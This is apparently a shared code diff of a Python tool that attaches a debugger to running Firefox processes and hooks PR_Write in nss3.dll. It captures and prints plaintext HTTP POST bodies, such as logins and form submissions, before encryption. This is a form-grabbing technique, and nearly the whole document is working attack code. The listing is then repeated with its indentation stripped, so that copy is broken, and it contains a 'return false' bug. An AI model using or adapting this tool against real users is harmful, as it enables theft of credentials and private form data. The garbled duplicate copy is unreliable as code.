davidlares · February 12, 2026 05:39
diff --git a/handler.py b/handler.py
 from winappdbg.event import EventHandler
 from winappdbg.process import Process
 import zlib

 # this class specifies the module and function to intercept
 class FirefoxHookHandler(EventHandler):
    def load_dll(self, event):
        # Get the new module object.
        module = event.get_module()
        # evaluating
        if module.match_name("nss3.dll"):
            pid = event.get_pid() # Get the process ID
            address = module.resolve("PR_Write") # Get the address of PR_Write
            if address:
                print('[+] Found PR_Write at addr: ' + str(address))
                # hooking function via debug (we resolve the memory address and the callback function)
                event.debug.hook_function(pid, address, self.callback, paramCount=3)

    # callback function
    def callback(self, event, address, fd, buf, amount):
        # getting the PID
        pid = event.get_pid()
        # getting the instance
        process = Process(event.get_pid())
        # reading the process memory
        if amount < 0:
            return false
        else:
            try:
                # evaluating for 'POST' requests only
                header_check = process.read(buf, 4)
                if header_check == b"POST":
                    # content
                    content = process.read(buf, amount)
                    # check for gzip within the POST body (NSPR)
                    if content.startswith(b'\x1f\x8b'):
                        try:
                            decompressed = zlib.decompress(content, 16 + zlib.MAX_WBITS)
                            # decompressed post body
                            print(decompressed.decode('utf-8', errors='ignore'))
                        except:
                            print("[!] Unable to decompress gzip body")
                    else:
                        try:
                            # formatting
                            print(f"--- DATA ({amount} bytes)")
                            # showing data
                            print(content.decode('utf-8', errors='ignore'))
                        except Exception as e:
                            print("[!] Unable to load content of POST body")
            except Exception as e:
                print(f"[-] Failed to read memory: {e}")
diff --git a/main.py b/main.py
 #/usr/bin/python

 from winappdbg.debug import Debug
 from handler import FirefoxHookHandler

 if __name__ == '__main__':
    # debug class inherited
    debug = Debug(FirefoxHookHandler())
    try:
        count = 0
        # looping for PIDs of firefox.exe
        for (process, name) in debug.system.find_processes_by_filename("firefox.exe"):
            pid = process.get_pid()
            try:
                print("[+] Found Firefox. PID is: " + str(process.get_pid()))
                # adding the PID to the debugger class
                debug.attach(process.get_pid())
                count += 1
            except Exception as attach_error:
                print(f"[-] Could not attach to {pid}: {attach_error}")
        # then
        if count > 0:
            debug.loop()
        else:
            print("[-] Not Firefox processes found")
    except KeyboardInterrupt as e:
        print("Stopping")
    finally:
        debug.stop()
diff --git a/requirements.txt b/requirements.txt
 winappdbg @ git+https://github.com/MarioVilas/winappdbg.git@bc52d752b3b281a92b9405dfed51053720352bba
	from winappdbg.event import EventHandler
	from winappdbg.process import Process
	import zlib

	# this class specifies the module and function to intercept
	class FirefoxHookHandler(EventHandler):
	def load_dll(self, event):
	# Get the new module object.
	module = event.get_module()
	# evaluating
	if module.match_name("nss3.dll"):
	pid = event.get_pid() # Get the process ID
	address = module.resolve("PR_Write") # Get the address of PR_Write
	if address:
	print('[+] Found PR_Write at addr: ' + str(address))
	# hooking function via debug (we resolve the memory address and the callback function)
	event.debug.hook_function(pid, address, self.callback, paramCount=3)

	# callback function
	def callback(self, event, address, fd, buf, amount):
	# getting the PID
	pid = event.get_pid()
	# getting the instance
	process = Process(event.get_pid())
	# reading the process memory
	if amount < 0:
	return false
	else:
	try:
	# evaluating for 'POST' requests only
	header_check = process.read(buf, 4)
	if header_check == b"POST":
	# content
	content = process.read(buf, amount)
	# check for gzip within the POST body (NSPR)
	if content.startswith(b'\x1f\x8b'):
	try:
	decompressed = zlib.decompress(content, 16 + zlib.MAX_WBITS)
	# decompressed post body
	print(decompressed.decode('utf-8', errors='ignore'))
	except:
	print("[!] Unable to decompress gzip body")
	else:
	try:
	# formatting
	print(f"--- DATA ({amount} bytes)")
	# showing data
	print(content.decode('utf-8', errors='ignore'))
	except Exception as e:
	print("[!] Unable to load content of POST body")
	except Exception as e:
	print(f"[-] Failed to read memory: {e}")
	#/usr/bin/python

	from winappdbg.debug import Debug
	from handler import FirefoxHookHandler

	if __name__ == '__main__':
	# debug class inherited
	debug = Debug(FirefoxHookHandler())
	try:
	count = 0
	# looping for PIDs of firefox.exe
	for (process, name) in debug.system.find_processes_by_filename("firefox.exe"):
	pid = process.get_pid()
	try:
	print("[+] Found Firefox. PID is: " + str(process.get_pid()))
	# adding the PID to the debugger class
	debug.attach(process.get_pid())
	count += 1
	except Exception as attach_error:
	print(f"[-] Could not attach to {pid}: {attach_error}")
	# then
	if count > 0:
	debug.loop()
	else:
	print("[-] Not Firefox processes found")
	except KeyboardInterrupt as e:
	print("Stopping")
	finally:
	debug.stop()